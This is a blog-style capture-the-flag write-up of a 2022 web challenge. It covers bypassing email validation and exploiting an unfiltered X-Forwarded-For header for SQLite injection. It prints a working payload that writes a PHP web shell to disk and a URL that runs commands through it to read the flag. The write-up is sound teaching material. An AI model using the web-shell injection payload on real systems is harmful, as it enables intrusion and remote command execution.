Open in app

Sign up

Sign in

Write

Sign up

Sign in

InfoSec Write-ups

Home

Newsletter

About

Follow publication

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties…

Follow publication

Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up

Prompt:

Intergalactic Post
The biggest intergalactic newsletter agency has constantly been spreading misinformation about the energy crisis war. Bonnie’s sources confirmed a hostile takeover of the agency took place a few months back, and we suspect the Golden Fang army is behind this. Ulysses found us a potential access point to their agency servers. Can you hack their newsletter subscribe portal and get us entry?

Start:

It is a web challange and we have the source code of the application, so we are downloading it and building it to test it on our local before get the flag from the real website.

Firstly we are checking website and its functionality,

It requires an e-mail to subscribe..

When we give e-mail format input it accepts.

But when we give another format like test’, it does not accepts.

Let’s check the source code, what it is doing to our input and how filtering it.

When I check it, it was using filter_var function which is checking if it is in e-mail format.

PHP filter_var() Function

W3Schools offers free online tutorials, references and exercises in all the major languages of the web. Covering…

www.w3schools.com

I also researched this function if there is any sql injection, because as you can see in the below image, it writes our e-mail to the database.

I found the below link.

GitHub - Xib3rR4dAr/filter-var-sqli: Bypassing FILTER_SANITIZE_EMAIL & FILTER_VALIDATE_EMAIL…

Story: While testing a site, I came across it's admin panel and got stuck at login. The common SQLi login bypass…

github.com

But this link can help for sqli login bypass with e-mail format. So in order to be sure, I edited the code as there is no filter_var function and I attack with sqlmap.

And yeah, I can get the tables etc.

But the other thing, I figure out, it also get our ip address and writes it to the database, and it hasn’t any filter function.

So, we can add the header to send our ip address.

You may check the below website for payload.

http://atta.cked.me/home/sqlite3injectioncheatsheet

we use this header

X-Forwarded-For: blahblah','blahblah');ATTACH DATABASE '/www/lol.php' as lol;CREATE TABLE lol.pwn(dataz text); INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--

It accepts it as it is valid e-mail, but it is not checking the ip address if it is in correct format.

then we have a web shell at /lol.php and can do

http://206.189.126.144:31604/lol.php?cmd=cat%20/flag*

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Sign up for free

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Try for $5/month
Pentest
Pentesting
Web App Security
Ethical Hacking
Ctf

InfoSec Write-ups
InfoSec Write-ups
Follow

Published in InfoSec Write-ups

55K Followers
Last published 18 hours ago

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow
zer0dac
zer0dac
Follow

Written by zer0dac

289 Followers
67 Following

Diary of a man who wants to hack his limits

Follow

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams